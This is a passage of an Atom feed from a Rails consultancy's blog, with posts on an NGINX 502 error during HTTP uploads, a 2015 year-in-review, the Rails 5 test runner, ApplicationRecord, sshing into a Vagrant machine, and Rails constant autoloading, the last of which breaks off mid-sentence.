}</code></pre><p>But that was not the case with our NGINX configuration. NGINX was configured to accept files of up to 250 megabytes, while the file being uploaded was around 6 megabytes.</p><p>In our Rails code we force all traffic to use HTTPS by having the following setting in <code>production.rb</code>.</p><pre><code class="language-ruby">config.force_ssl = true</code></pre><p>What this setting does is force HTTPS by redirecting HTTP requests to their HTTPS counterparts. So any request accessing <code>http://domain.com/path</code> will be redirected to <code>https://domain.com/path</code>.</p><p>Forcing all traffic to HTTPS still does not explain the vague error <code>sendfile() failed (32: Broken pipe) while sending request to upstream</code>, nor why we got the <code>HTTP 502</code> error, which means <code>Bad Gateway</code>.</p><p>Here is how our <code>nginx.conf</code> is configured.</p><pre><code class="language-bash">server {
  ...
  listen 80;
  listen 443 ssl;
  ...
}</code></pre><p>NGINX is configured to accept both HTTP and HTTPS requests. This is a pretty standard setting so that the application can support both HTTP and HTTPS. Note that NGINX itself does not force an HTTP request to become HTTPS; it forwards HTTP requests as-is to the Rails backend API.</p><h2>Here is what happens when you upload a file</h2><p>When we upload a file, NGINX takes that request and passes it to Rails. NGINX expects a response from Rails only when NGINX is done sending the whole request.</p><p>Let's see what happens when a user visits the login page using HTTP. NGINX takes the request and passes it to Rails. When NGINX is done handing over the request to Rails, NGINX expects a response from Rails. However, in this case rather than sending a 200, Rails sends a redirect over HTTPS. So NGINX takes up the request again over HTTPS and then hands the request over to Rails. Rails processes the request and returns 200. Everything works out.</p><p>Now let's see what happens when a file is uploaded over HTTP.</p><p>A user uploads a file over HTTP. NGINX takes up the request and starts sending the file to Rails. More details about the file upload process can be seen in the RFC (Link is not available). The data is sent to the server in chunks. When the first chunk is sent to the server, the server notices that the data is being sent over HTTP and immediately sends a response saying that the data should be sent over HTTPS.</p><p>In the meantime, on the client side, the client is still pushing the rest of the data to the server. The client expects a response from the server only when it is done pushing all the data. However, in this case the server sends a response when the client is not expecting it.</p><p>NGINX at this point is confused, thinks something has gone wrong with the gateway, returns <code>HTTP/1.1 502 Bad Gateway</code>, and aborts the upload operation. And that is how we get the <code>502</code> error.</p><p>So the next time you see an error like this, make sure that you are using <code>https</code> to upload the file if the server is enforcing <code>https</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Year in review 2015]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/year-in-review-2015"/>
      <updated>2016-01-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/year-in-review-2015</id>
      <content type="html"><![CDATA[<p>Year 2015 was an exciting year for BigBinary !</p><p>We added more <a href="https://bigbinary.com/clients">clients</a>. We increased<a href="https://bigbinary.com/team">our team</a> size. We wrote more <a href="/blog">blogs</a>, spokeat more <a href="https://bigbinary.com/presentations">conferences</a>, and made even<a href="https://bigbinary.com/videos">more videos</a> !</p><p>Here is the breakdown.</p><h2>We love conferences</h2><p>We presented at 10 conferences across 7 countries, on topics from<a href="http://rubyonrails.org/">Rails</a> to<a href="https://facebook.github.io/react/">ReactJS</a>.</p><ul><li><a href="http://www.gardencityruby.org/">Garden City RubyConf, India</a></li><li><a href="http://rubyconf.ph/">RubyConf, Philippines</a></li><li><a href="http://rubyconfindia.org/">RubyConf, India</a></li><li><a href="http://www.reddotrubyconf.com/">Reddot RubyConf, Singapore</a></li><li><a href="http://www.deccanrubyconf.org/">Deccan RubyConf, India</a></li><li><a href="http://2015.fullstackfest.com/">Full Stack Fest, Spain</a></li><li><a href="http://2015.rubyconf.tw/">RubyConf, Taiwan</a></li><li><a href="http://rockymtnruby.com/">Rocky Mountain Ruby, Colorado</a></li><li><a href="http://www.rubyconf.co/">RubyConf, Colombia</a></li></ul><h2>We are all in ReactJS</h2><p>We at BigBinary adopted ReactJS pretty early. Early in the year we publishedseries of videos titled<a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in steps</a>which takes a &quot;Hello World&quot; app into a full TODO application using ReactJS inincremental steps.</p><p>Vipul and Prathamesh are currently authoring a book on ReactJS. Check it out at<a href="https://www.packtpub.com/web-development/reactjs-example-building-modern-web-applications-react">ReactJS by Example- Building Modern Web Applications with React Book</a></p><p>We also started an ios app using React Native. 
It's coming along pretty well and soon we should see it in the App Store.</p><h2>We authored many blogs</h2><p>We love sharing our experiences via blogs on various topics like ReactJS, Rails, React Native and Robot Framework. Here are some of our blogs from 2015.</p><ul><li><a href="how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript">How to obtain current time from a different timezone in Selenium IDE using JavaScript</a>, Prabhakar, Jan 2015</li><li><a href="author-information-in-jekyll-blog">Author information in Jekyll blog</a>, Neeraj, Jan 2015</li><li><a href="phone-verification-using-twilio">Phone verification using SMS via Twilio</a>, Santosh, Jan 2015</li><li><a href="blue-border-around-jwplayer-video">Blue border around JWPlayer video</a>, Prathamesh, Feb 2015</li><li><a href="gotcha-with-after_commit-callback-in-rails">Gotcha with after_commit callback in Rails</a>, Prathamesh, March 2015</li><li><a href="voice-based-phone-verification-using-twilio">Voice based phone verification using Twilio</a>, Santosh, March 2015</li><li><a href="verifying-pubsub-services-from-rails-redis">Verifying PubSub Services from Rails using Redis</a>, Vipul, May 2015</li><li><a href="using-reactjs-with-rails-actioncable">Using ReactJS with Rails Action Cable</a>, Vipul, July 2015</li><li><a href="how-to-test-react-native-app-on-real-iphone">How to test React Native App on a real iPhone</a>, Chirag, Aug 2015</li><li><a href="code-optimize-javascript-code-using-babeljs">Optimize JavaScript code using BabelJS</a>, Prathamesh, Aug 2015</li><li><a href="configuring-pycharm-to-run-tests">Configuring PyCharm IDE to run a Robot Framework test suite or a single test script</a>, Prabhakar, Oct 2015</li><li><a href="migrating-from-postgresql-to-sqlserver">Migrating Rails app from PostgreSQL to SQL Server</a>, Rohit, Oct 2015</li><li><a href="getting-around-apple-ituneconnect-activation-issue">Getting around Apple iTunesConnect account activation issue</a>, Prathamesh,
Oct 2015</li><li><a href="rails-5-allows-setting-custom-http-headers-for-assets">Rails 5 allows setting custom HTTP Headers for assets</a>, Vipul, Oct 2015</li><li><a href="using-stripe-api-in-react-native-with-fetch">Using Stripe API in React Native with fetch</a>, Chirag, Nov 2015</li><li><a href="how-constant-lookup-happens-in-rails">How constant lookup and resolution works in Ruby on Rails</a>, Mohit, Nov 2015</li><li><a href="explicitly-ssh-into-vagrant-machine">Explicitly ssh into vagrant machine</a>, Neeraj, Dec 2015</li><li><a href="application-record-in-rails-5">ApplicationRecord in Rails 5</a>, Prathamesh, Dec 2015</li></ul><h2>Video Summary</h2><ul><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails">Learn Ruby on Rails</a><ul><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails/use-uuid-x-request-id-and-tagged-logging-to-debug-rails-application">Use uuid, X-Request-Id and tagged logging to debug Rails application</a></li><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails/rails-development-using-vagrant">Rails development using vagrant</a></li><li><a href="https://bigbinary.com/videos/learn-ruby-on-rails/using-es6-in-rails-application">Using ES6 in Rails application</a></li></ul></li><li><a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in steps</a></li><li><a href="https://bigbinary.com/videos/keep-up-with-reactjs">Keep up with ReactJS</a></li><li><a href="https://bigbinary.com/videos/learn-javascript">Learn JavaScript</a><ul><li><a href="https://bigbinary.com/videos/learn-javascript/refactor-javascript-code-using-module-pattern">Refactor JavaScript code using module pattern</a></li><li><a href="https://bigbinary.com/videos/learn-javascript/a-review-of-tools-to-test-es6">A review of tools to test ES6</a></li></ul></li><li><a href="https://bigbinary.com/videos/learn-selenium">Learn Selenium</a></li></ul><h2>Open Source</h2><p>Apart from our team members contributing to various open source projects, we
also support some projects from our team. This year, we added and helped build the following projects:</p><ul><li><a href="https://github.com/bigbinary/wheel">Wheel</a>: Wheel is our Rails template for new Ruby on Rails projects, with sane defaults and setups for different environments, and common functionality like image uploaders, debugging, etc.</li><li><a href="https://github.com/bigbinary/mail_interceptor">Mail Interceptor</a>: Intercepting and forwarding emails in Ruby on Rails applications</li><li><a href="https://github.com/bigbinary/handy">Handy</a>: A collection of handy tools and Rails tasks for your project.</li><li><a href="https://github.com/bigbinary/learn-reactjs-in-steps">Learn ReactJS in Steps</a>: Collection of examples from the <a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in steps</a> video series.</li><li>Docsplit Chef (link is not available): Chef cookbook for the <a href="https://documentcloud.github.io/docsplit/">docsplit</a> Ruby gem</li><li>Fixtures Dumper (link is not available): Dump your Rails database data to fixtures easily.</li></ul><h2>Community Engagement</h2><p>Along with speaking at various conferences, we also helped organize the fun edition of Pune's regional RubyConf, <a href="http://www.deccanrubyconf.org/">DeccanRubyConf</a>, and supported other Indian conferences, including <a href="http://rubyconfindia.org/">RubyConfIndia</a> and <a href="http://www.gardencityruby.org/">GardenCity RubyConf</a>.</p><p>We also help run Pune's local <a href="http://www.meetup.com/punerailsmeetup/">Ruby meetup</a>, which had splendid engagement this year.</p><p>Overall, we are super excited about what we accomplished in 2015 and are looking forward to an exciting 2016!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Test runner in Rails 5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/test-runner-in-rails-5"/>
      <updated>2016-01-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/test-runner-in-rails-5</id>
       <content type="html"><![CDATA[<p>If you run <code>bin/rails -h</code> in a Rails 5 app, you will see a new command for running tests.</p><pre><code class="language-bash">$ bin/rails -h
Usage: rails COMMAND [ARGS]

The most common rails commands are:
 generate    Generate new code (short-cut alias: &quot;g&quot;)
 console     Start the Rails console (short-cut alias: &quot;c&quot;)
 server      Start the Rails server (short-cut alias: &quot;s&quot;)
 test        Run tests (short-cut alias: &quot;t&quot;)</code></pre><p>Before Rails 5, we had to use <code>bin/rake test</code> to run tests. But in Rails 5, we can use <code>bin/rails test</code>. It is not just a replacement for the old rake task; it is backed by a <code>test runner</code> inspired by RSpec, minitest-reporters, maxitest and others.</p><p>Let's see what <code>bin/rails test</code> can do.</p><h2>Running a single test</h2><p>Now it is possible to run a single test out of the box using the line number of the test.</p><pre><code class="language-bash">$ bin/rails test test/models/user_test.rb:27</code></pre><p>Rails will intelligently run the test from user_test.rb that spans line number 27. Note that line number 27 does not need to be the first line of the test.
Below is an example.</p><pre><code class="language-ruby">22: def test_valid_user
23:   hash = { email: 'bob@example.com',
24:            first_name: 'John',
25:            last_name: 'Smith' }
26:
27:   user = User.new hash
28:
29:   assert user.valid?
30: end</code></pre><p>In the above case, <code>test_valid_user</code> can be run as long as the line number provided is between 22 and 30.</p><h2>Running multiple tests</h2><p>You can also pass multiple test paths and Rails will run all of those tests.</p><pre><code class="language-bash">$ bin/rails test test/models/user_test.rb:27 test/models/post_test.rb:42</code></pre><p>It is also possible to run all tests from a directory.</p><pre><code class="language-bash">$ bin/rails test test/controllers test/integration</code></pre><h2>Improved failure messages</h2><p>When a test fails, Rails displays a command which can be used to rerun just the failed test.</p><pre><code class="language-bash">$ bin/rails t
Run options: --seed 51858

# Running:

.F

Failure:
PostsControllerTest#test_should_get_new:
Expected response to be a &lt;success&gt;, but was a &lt;302&gt; redirect to &lt;http://test.host/posts&gt;

bin/rails test test/controllers/posts_controller_test.rb:15</code></pre><p>I can simply copy <code>bin/rails test test/controllers/posts_controller_test.rb:15</code> and rerun the failing test.</p><h2>Failing fast</h2><p>By default, when a test fails, Rails reports the failure and moves on to the next test. If you want to stop the run as soon as a test fails, use the <code>-f</code> option.</p><pre><code class="language-bash">$ bin/rails t -f
Run options: -f --seed 59599

# Running:

..F

Failure:
PostsControllerTest#test_should_get_new:
Expected response to be a &lt;success&gt;, but was a &lt;302&gt; redirect to &lt;http://test.host/posts&gt;

bin/rails test test/controllers/posts_controller_test.rb:15

Interrupted.
Exiting...

Finished in 0.179125s, 16.7481 runs/s, 22.3308 assertions/s.

3 runs, 4 assertions, 1 failures, 0 errors, 0 skips</code></pre><h2>Defer test output until the end of the full test run</h2><p>By default, when a test fails, Rails prints <code>F</code> followed by details about the failure, like which assertion failed and how to rerun the test.</p><p>If you want a clean output of <code>.</code> and <code>F</code>, with the full failure report at the very end, use the <code>-d</code> option.</p><pre><code class="language-plaintext">$ bin/rails t -d
Run options: -d --seed 29906

# Running:

..F...F

Finished in 0.201320s, 34.7704 runs/s, 49.6721 assertions/s.

  1) Failure:
PostsControllerTest#test_should_create_post [/Users/prathamesh/Projects/fun/rails-5-test-runner-app/test/controllers/posts_controller_test.rb:19]:
&quot;Post.count&quot; didn't change by 1.
Expected: 3
  Actual: 2

  2) Failure:
PostsControllerTest#test_should_get_new [/Users/prathamesh/Projects/fun/rails-5-test-runner-app/test/controllers/posts_controller_test.rb:15]:
Expected response to be a &lt;success&gt;, but was a &lt;302&gt; redirect to &lt;http://test.host/posts&gt;

7 runs, 10 assertions, 2 failures, 0 errors, 0 skips

Failed tests:

bin/rails test test/controllers/posts_controller_test.rb:19
bin/rails test test/controllers/posts_controller_test.rb:15</code></pre><h2>Better backtrace output</h2><p>By default, when an error is encountered while running the tests, the output does not contain the full stacktrace.
This makes debugging a little bit difficult.</p><pre><code class="language-plaintext">Error:
PostsControllerTest#test_should_create_post:
NameError: undefined local variable or method `boom' for #&lt;PostsController:0x007f86bc62b728&gt;
    app/controllers/posts_controller.rb:29:in `create'
    test/controllers/posts_controller_test.rb:20:in `block (2 levels) in &lt;class:PostsControllerTest&gt;'
    test/controllers/posts_controller_test.rb:19:in `block in &lt;class:PostsControllerTest&gt;'</code></pre><p>Now we can use the <code>-b</code> switch, which displays the complete backtrace of the error message.</p><pre><code class="language-plaintext">$ bin/rails t -b

Error:
PostsControllerTest#test_should_create_post:
NameError: undefined local variable or method `boom' for #&lt;PostsController:0x007fc53c4eb868&gt;
    /rails-5-test-runner-app/app/controllers/posts_controller.rb:29:in `create'
    /sources/rails/actionpack/lib/action_controller/metal/basic_implicit_render.rb:4:in `send_action'
    /sources/rails/actionpack/lib/abstract_controller/base.rb:183:in `process_action'
    /sources/rails/actionpack/lib/action_controller/metal/rendering.rb:30:in `process_action'
    /sources/rails/actionpack/lib/abstract_controller/callbacks.rb:20:in `block in process_action'
    /sources/rails/activesupport/lib/active_support/callbacks.rb:126:in `call'
    .....
    /sources/rails/activesupport/lib/active_support/testing/assertions.rb:71:in `assert_difference'
    /rails-5-test-runner-app/test/controllers/posts_controller_test.rb:19:in `block in &lt;class:PostsControllerTest&gt;'</code></pre><h2>Leveraging the power of Minitest</h2><p>The test runner also leverages the power of Minitest by providing some handy options.</p><h4>Switch -s to provide your own seed</h4><p>Now we can also provide our own seed using the <code>-s</code> switch.</p><pre><code class="language-bash">$ bin/rails t -s 42000</code></pre><h4>Switch -n to run matching tests</h4><p>Switch <code>-n</code> will run tests matching the given string or regular expression pattern.</p><pre><code class="language-plaintext">$ bin/rails t -n &quot;/create/&quot;
Run options: -n /create/ --seed 24558

# Running:

E

Error:
PostsControllerTest#test_should_create_post:
NameError: undefined local variable or method `boom' for #&lt;PostsController:0x007faa39c2df90&gt;
    app/controllers/posts_controller.rb:29:in `create'
    test/controllers/posts_controller_test.rb:20:in `block (2 levels) in &lt;class:PostsControllerTest&gt;'
    test/controllers/posts_controller_test.rb:19:in `block in &lt;class:PostsControllerTest&gt;'

bin/rails test test/controllers/posts_controller_test.rb:18

Finished in 0.073857s, 13.5396 runs/s, 0.0000 assertions/s.

1 runs, 0 assertions, 0 failures, 1 errors, 0 skips</code></pre><h4>Verbose output</h4><p>It is also possible to see verbose output using the <code>-v</code> switch. It shows the time required to run each test.
This helps in detecting slow-running tests.</p><pre><code class="language-plaintext">$ bin/rails t -v
Run options: -v --seed 30118

# Running:

PostsControllerTest#test_should_destroy_post = 0.07 s = .
PostsControllerTest#test_should_update_post = 0.01 s = .
PostsControllerTest#test_should_show_post = 0.10 s = .
PostsControllerTest#test_should_create_post = 0.00 s = F

Failure:
PostsControllerTest#test_should_create_post:
&quot;Post.count&quot; didn't change by 1.
Expected: 3
  Actual: 2

bin/rails test test/controllers/posts_controller_test.rb:19

PostsControllerTest#test_should_get_new = 0.02 s = .
PostsControllerTest#test_should_get_index = 0.01 s = .
PostsControllerTest#test_should_get_edit = 0.00 s = .

Finished in 0.210071s, 33.3220 runs/s, 47.6028 assertions/s.

7 runs, 10 assertions, 1 failures, 0 errors, 0 skips</code></pre><h3>Colored output</h3><p>Now, by default, we get colored output. No need to add an additional gem to get colored output.</p><p><img src="/blog_images/2016/test-runner-in-rails-5/rails_5_test_runner.png" alt="colored test output"></p><p>With all these awesome features, testing Rails 5 apps has definitely become a better experience. Rails has shipped all these features within the framework itself, so you don't have to use multiple gems and libraries to achieve all of these things.</p>]]></content>
    </entry><entry>
       <title><![CDATA[ApplicationRecord in Rails 5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/application-record-in-rails-5"/>
      <updated>2015-12-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/application-record-in-rails-5</id>
       <content type="html"><![CDATA[<p><a href="http://weblog.rubyonrails.org/2015/12/18/Rails-5-0-beta1/">Rails 5 beta-1</a> was recently released, and one of the notable changes was the introduction of <a href="https://github.com/rails/rails/pull/22567">ApplicationRecord</a>.</p><p>Up to Rails 4.2, all models inherited from <code>ActiveRecord::Base</code>. But starting from Rails 5, all models will inherit from <code>ApplicationRecord</code>.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord
end</code></pre><p>What happened to <code>ActiveRecord::Base</code>?</p><p>Well, not much has changed in reality. The following file will be automatically added to models in Rails 5 applications.</p><pre><code class="language-ruby"># app/models/application_record.rb
class ApplicationRecord &lt; ActiveRecord::Base
  self.abstract_class = true
end</code></pre><p>This behavior is similar to how controllers inherit from <code>ApplicationController</code> instead of inheriting from <code>ActionController::Base</code>.</p><p>Now <code>ApplicationRecord</code> will be a single point of entry for all the customizations and extensions needed for an application, instead of monkey patching <code>ActiveRecord::Base</code>.</p><p>Say I want to add some extra functionality to Active Record.
This is what I would do in Rails 4.2.</p><pre><code class="language-ruby">module MyAwesomeFeature
  def do_something_great
    puts &quot;Doing some complex stuff!!&quot;
  end
end

ActiveRecord::Base.include(MyAwesomeFeature)</code></pre><p>But now, <code>ActiveRecord::Base</code> forever includes <code>MyAwesomeFeature</code>, and any class inheriting from it also includes <code>MyAwesomeFeature</code>, even if it doesn't want it.</p><p>This is especially problematic if you are using plugins and engines, where monkey patches to <code>ActiveRecord::Base</code> can leak into engine or plugin code.</p><p>But with <code>ApplicationRecord</code>, such extensions are localized to only those models which inherit from <code>ApplicationRecord</code>, effectively only to your application.</p><pre><code class="language-ruby">class ApplicationRecord &lt; ActiveRecord::Base
  include MyAwesomeFeature

  self.abstract_class = true
end</code></pre><h2>Migrating from Rails 4</h2><p>By default, all new Rails 5 applications will have <code>application_record.rb</code>. If you are migrating from Rails 4, then simply create <code>app/models/application_record.rb</code> as shown below and change all models to inherit from <code>ApplicationRecord</code> instead of <code>ActiveRecord::Base</code>.</p><pre><code class="language-ruby"># app/models/application_record.rb
class ApplicationRecord &lt; ActiveRecord::Base
  self.abstract_class = true
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Explicitly ssh into vagrant machine]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/explicitly-ssh-into-vagrant-machine"/>
      <updated>2015-12-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/explicitly-ssh-into-vagrant-machine</id>
       <content type="html"><![CDATA[<p>After building a Vagrant machine, the command to ssh into the guest machine is pretty simple.</p><pre><code class="language-plaintext">vagrant ssh</code></pre><p>While working with Chef, I needed to explicitly ssh into the Vagrant machine. It took me some time to figure it out.</p><p>The key is the command <code>vagrant ssh-config</code>. Its output might look like this.</p><pre><code class="language-plaintext">$ vagrant ssh-config
Host vmachine
  HostName 127.0.0.1
  User vagrant
  Port 2222
  UserKnownHostsFile /dev/null
  StrictHostKeyChecking no
  PasswordAuthentication no
  IdentityFile /Users/nsingh/code/vagrant-machine/.vagrant/machines/vmachine/virtualbox/private_key
  IdentitiesOnly yes
  LogLevel FATAL
  ForwardAgent yes</code></pre><p>Open <code>~/.ssh/config</code>, paste the output at the end of the file, and save the file.</p><p>Now I can ssh into the Vagrant machine using the ssh command as shown below.</p><pre><code class="language-plaintext">ssh vmachine</code></pre><p>If you are wondering where the name <code>vmachine</code> came from, it is the name I had given to <a href="https://github.com/bigbinary/vagrant-machine/blob/f5257dc088dfdf07c73e57130425c28a363dc399/Vagrantfile#L17">my vagrant machine</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How constant lookup and resolution works in Ruby on Rails]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/how-constant-lookup-happens-in-rails"/>
      <updated>2015-11-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-constant-lookup-happens-in-rails</id>
       <content type="html"><![CDATA[<p>When a Rails application involves multiple gems, engines, etc., it's important to know how constants are looked up and resolved.</p><p>Consider a brand new Rails app with model <code>User</code>.</p><pre><code class="language-ruby">class User
  def self.model_method
    'I am in models directory'
  end
end</code></pre><p>Run <code>User.model_method</code> in the Rails console. It runs as expected.</p><p>Now add a <code>user.rb</code> file in the <code>lib</code> directory.</p><pre><code class="language-ruby">class User
  def self.lib_method
    'I am in lib directory'
  end
end</code></pre><p>Reload the Rails console and try executing <code>User.model_method</code> and <code>User.lib_method</code>. You will notice that <code>User.model_method</code> gets executed and <code>User.lib_method</code> doesn't. Why is that?</p><h2>In Rails we do not import files</h2><p>If you have worked in other programming languages like Python or Java, then your files must have statements to import other files. The code might look like this.</p><pre><code class="language-plaintext">import static com.googlecode.javacv.jna.highgui.cvCreateCameraCapture;
import static com.googlecode.javacv.jna.highgui.cvGrabFrame;
import static com.googlecode.javacv.jna.highgui.cvReleaseCapture;</code></pre><p>In Rails we do not do that. That's because <a href="https://twitter.com/dhh">DHH</a> does not like the idea of opening a file and seeing the top of the file littered with import statements. He likes his files beautiful.</p><p>Since we do not import files, how does it work?</p><p>In the Rails console, when the user types <code>User</code>, Rails detects that the <code>User</code> constant is not loaded yet. So it needs to load the <code>User</code> constant. However, in order to do that, it has to load a file. What should be the name of that file?
Here is what Rails does: since the constant name is <code>User</code>, Rails looks for the file <code>user.rb</code>.</p><p>So now we know that we are looking for the <code>user.rb</code> file. But the question is where to look for that file. Rails has <code>autoload_paths</code>. As the name suggests, this is a list of paths from which files are automatically loaded. Rails will search for <code>user.rb</code> in this list of directories.</p><p>Open the Rails console and give it a try.</p><pre><code class="language-plaintext">$ rails console
Loading development environment (Rails 4.2.1)
irb(main):001:0&gt; ActiveSupport::Dependencies.autoload_paths
=&gt; [&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/assets&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/controllers&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/models&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/helpers&quot;
.............</code></pre><p>As you can see in the result, one of the folders is <code>app/models</code>.
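The constant-to-file mapping described above can be sketched in plain Ruby. This is an approximation of ActiveSupport's <code>String#underscore</code> (the real implementation handles a few more cases, such as acronyms and dashes), shown here only to make the mapping concrete:

```ruby
# Approximate sketch of ActiveSupport's String#underscore, which Rails
# uses to turn a constant name into the relative file path to load.
def underscore(name)
  name.gsub("::", "/")                          # namespaces become directories
      .gsub(/([A-Z\d]+)([A-Z][a-z])/, '\1_\2')  # split acronym runs: "HTMLParser" -> "HTML_Parser"
      .gsub(/([a-z\d])([A-Z])/, '\1_\2')        # split camelCase boundaries
      .downcase
end

underscore("User")            # => "user"            -> looks for user.rb
underscore("Admin::UserRole") # => "admin/user_role" -> looks for admin/user_role.rb
```

So typing `Admin::UserRole` in the console makes Rails search the autoload paths for `admin/user_role.rb`.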
When Rails looks for the file <code>user.rb</code> in <code>app/models</code>, it will find it and load that file.</p><p>That's how Rails loads <code>User</code> in the Rails console.</p><h2>Adding lib to the autoload path</h2><p>Let's try to load <code>User</code> from the <code>lib</code> directory. Open <code>config/application.rb</code> and add the following code in the initialization part.</p><pre><code class="language-plaintext">config.autoload_paths += [&quot;#{Rails.root}/lib&quot;]</code></pre><p>Now exit the Rails console, restart it, and execute the same command again.</p><pre><code class="language-plaintext">$ rails console
Loading development environment (Rails 4.2.1)
irb(main):001:0&gt; ActiveSupport::Dependencies.autoload_paths
=&gt; [&quot;/Users/nsingh/code/bigbinary-projects/wheel/lib&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/assets&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/controllers&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/models&quot;,
&quot;/Users/nsingh/code/bigbinary-projects/wheel/app/helpers&quot;
.............</code></pre><p>Here you can see that the <code>lib</code> directory has been added at the very top. Rails goes from top to bottom while looking for the <code>user.rb</code> file. In this case Rails will find <code>user.rb</code> in <code>lib</code> and stop looking for <code>user.rb</code>. So the end result is that <code>user.rb</code> in the <code>app/models</code> directory would not even get loaded, as if it never existed.</p><h2>Enhancing a model</h2><p>Here we are trying to add an extra method to the <code>User</code> model. If we stick our file in <code>lib</code>, then our <code>user.rb</code> is never loaded, because Rails will never look for anything in <code>lib</code> by default. If we ask Rails to look in <code>lib</code>, then Rails will not load the file from <code>app/models</code>, because the constant is already defined.
So how do we enhance a model without sticking code in the <code>app/models/user.rb</code> file?</p><h2>Introducing initializer to load files from model and lib directories</h2><p>We need some way to load <code>User</code> from both the models and lib directories. This can be done by adding an initializer to the <em>config/initializers</em> directory with the following code snippet.</p><pre><code class="language-ruby">%w(app/models lib).each do |directory|
  Dir.glob(&quot;#{Rails.root}/#{directory}/user.rb&quot;).each { |file| load file }
end</code></pre><p>Now both <code>User.model_method</code> and <code>User.lib_method</code> get executed as expected.</p><p>In the above case, when <code>user.rb</code> is loaded the first time, the constant <code>User</code> gets defined. The second time, Ruby understands that the constant is already defined, so it does not bother defining it again. However, it adds the additional method <code>lib_method</code> to the constant.</p><p>In the above case, if we replace <code>load file</code> with <code>require file</code>, then <code>User.lib_method</code> will not work. That is because <code>require</code> will not load a file that has already been loaded. Read <a href="http://stackoverflow.com/questions/3170638/how-does-load-differ-from-require-in-ruby">here</a> and <a href="https://practicingruby.com/articles/ways-to-load-code">here</a> to learn about how <code>load</code> and <code>require</code> differ.</p><h2>Using 'require_relative' in model</h2><p>Another approach to solving this issue is using <code>require_relative</code> inside the model. <code>require_relative</code> loads the file at a path relative to the file in which the statement is called. The desired file is given as an argument to <code>require_relative</code>.</p><p>In our example, to have <code>User.lib_method</code> successfully executed, we need to load <code>lib/user.rb</code>.
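Both the initializer and the <code>require_relative</code> approaches rely on Ruby's class-reopening semantics. A minimal plain-Ruby sketch (no Rails involved) of what happens when two files both define <code>class User</code>:

```ruby
# Plain-Ruby sketch of class reopening: defining `class User` twice does
# not replace the class; the second definition reopens the first one and
# merges its methods in.
class User                  # as in app/models/user.rb
  def self.model_method
    'I am in models directory'
  end
end

class User                  # as in lib/user.rb, loaded later
  def self.lib_method
    'I am in lib directory'
  end
end

User.model_method # => "I am in models directory"
User.lib_method   # => "I am in lib directory"
```

Loading the two real files one after the other behaves exactly like this sketch: one `User` constant ends up carrying methods from both files.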
Adding the following code at the beginning of the model file <code>user.rb</code> should solve the problem. This is how <code>app/models/user.rb</code> will now look.</p><pre><code class="language-ruby">require_relative '../../lib/user'

class User
  def self.model_method
    'I am in models directory'
  end
end</code></pre><p>Here, <code>require_relative</code> upon execution will first initialize the constant <code>User</code> from the lib directory. What follows is the reopening of the same <code>User</code> class, which has already been initialized, and the addition of <code>model_method</code> to it.</p><h2>Handling priorities between Engine and App</h2><p>In one of our projects we are using <a href="http://guides.rubyonrails.org/engines.html">engines</a>. <code>SaleEngine</code> has a model <code>Sale</code>. However, <code>Sale</code> doesn't get resolved, as the path for the engine is present neither in <code>config.autoload_paths</code> nor in <code>ActiveSupport::Dependencies.autoload_paths</code>. The initialization of the engine happens in the <code>engine.rb</code> file inside the <code>lib</code> directory of the engine. Let's add a line to load <code>engine.rb</code> inside the <code>application.rb</code> file.</p><pre><code class="language-ruby">require_relative &quot;../sale_engine/lib/sale_engine/engine.rb&quot;</code></pre><p>In the Rails console, if we inspect the autoload paths, we will see that <code>lib/sale_engine</code> is present there. That means we can now use <code>SaleEngine::Engine</code>.</p><p>Now any file we add in the <code>sale_engine</code> directory will be loaded. However, if we add <code>user.rb</code> here, then the <code>user.rb</code> in <code>app/models</code> will be loaded first, because the application directories have precedence.
The precedence order can be changed with the following statements.</p><pre><code class="language-ruby">engines = [SaleEngine::Engine] # in case there are multiple engines
config.railties_order = engines + [:main_app]</code></pre><p>The symbol <code>:main_app</code> refers to the application where the server comes up. After adding the above code, you will see that the output of <code>ActiveSupport::Dependencies.autoload_paths</code> now shows the directories of the engines first (in the order in which they have been given) and then those of the application. Hence, for any class which is common between your app and an engine, the one from the engine will now get resolved. You can experiment by adding multiple engines and changing the <code>railties_order</code>.</p><h2>Further reading</h2><p>Loading of constants is a big topic, and <a href="https://twitter.com/fxn">Xavier Noria</a> from the Rails core team has given some excellent presentations. Here are some of them:</p><ul><li><a href="https://www.youtube.com/watch?v=8lYR9WxIRH0">Constant Autoloading in Ruby on Rails</a> Baruco 2013</li><li><a href="https://www.youtube.com/watch?v=wCyTRdtKm98">Constants in Ruby</a> RuLu 2012</li><li><a href="https://www.youtube.com/watch?v=4sIU8PxJEEk">Class Reloading in Ruby on Rails</a> RailsConf 2014</li></ul><p>We have also made a video on <a 